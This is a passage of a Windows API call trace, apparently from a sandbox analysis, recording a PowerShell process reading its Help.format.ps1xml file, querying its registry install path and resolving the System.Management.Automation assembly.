	[0411.712] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.713] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.713] SetErrorMode (uMode=0x1) returned 0x1
	[0411.713] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0411.713] GetFileType (hFile=0x2fc) returned 0x1
	[0411.713] SetErrorMode (uMode=0x1) returned 0x1
	[0411.713] GetFileType (hFile=0x2fc) returned 0x1
	[0411.713] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.714] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.714] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.714] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.714] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.714] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.715] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.715] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.717] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.717] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.717] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.718] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.718] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.719] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.719] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.719] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.719] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.720] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.720] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.720] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.720] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.721] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.721] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.721] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.721] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.721] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.722] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.723] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.723] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.724] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.724] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.724] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.724] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.724] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.724] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.725] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.725] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.725] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.725] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.725] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.726] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.726] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.726] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.726] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.726] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.726] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.726] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.727] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.727] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.727] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.727] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.727] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.727] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.727] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.727] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.727] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.728] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.728] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0xf37, lpOverlapped=0x0) returned 1
	[0411.728] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eba577, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2eba577*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0411.728] ReadFile (in: hFile=0x2fc, lpBuffer=0x2ebaed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2ebaed8*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0411.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.728] SetErrorMode (uMode=0x1) returned 0x1
	[0411.728] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0411.728] SetErrorMode (uMode=0x1) returned 0x1
	[0411.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.729] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2a8 | out: phkResult=0x20d2a8*=0x2fc) returned 0x0
	[0411.729] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d22c, lpData=0x0, lpcbData=0x20d228*=0x0 | out: lpType=0x20d22c*=0x1, lpData=0x0, lpcbData=0x20d228*=0x56) returned 0x0
	[0411.729] CoTaskMemAlloc (cb=0x5a) returned 0x2b9000
	[0411.729] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d1fc, lpData=0x2b9000, lpcbData=0x20d1f8*=0x56 | out: lpType=0x20d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d1f8*=0x56) returned 0x0
	[0411.729] CoTaskMemFree (pv=0x2b9000) 
	[0411.729] RegCloseKey (hKey=0x2fc) returned 0x0
	[0411.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.733] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xb78435e8, Data2=0x53bb, Data3=0x4ed6, Data4=([0]=0xa0, [1]=0x83, [2]=0xdc, [3]=0xf5, [4]=0xac, [5]=0xb0, [6]=0x7d, [7]=0xbc))) returned 0x0
	[0411.733] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x29e8aed8, Data2=0xebf4, Data3=0x48dc, Data4=([0]=0x8a, [1]=0x77, [2]=0x26, [3]=0xee, [4]=0x7, [5]=0x51, [6]=0x81, [7]=0xe))) returned 0x0
	[0411.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.324] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xe788030a, Data2=0xbbc4, Data3=0x404f, Data4=([0]=0x88, [1]=0xd5, [2]=0x8d, [3]=0x4a, [4]=0x6b, [5]=0x3d, [6]=0xd7, [7]=0xf7))) returned 0x0
	[0412.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
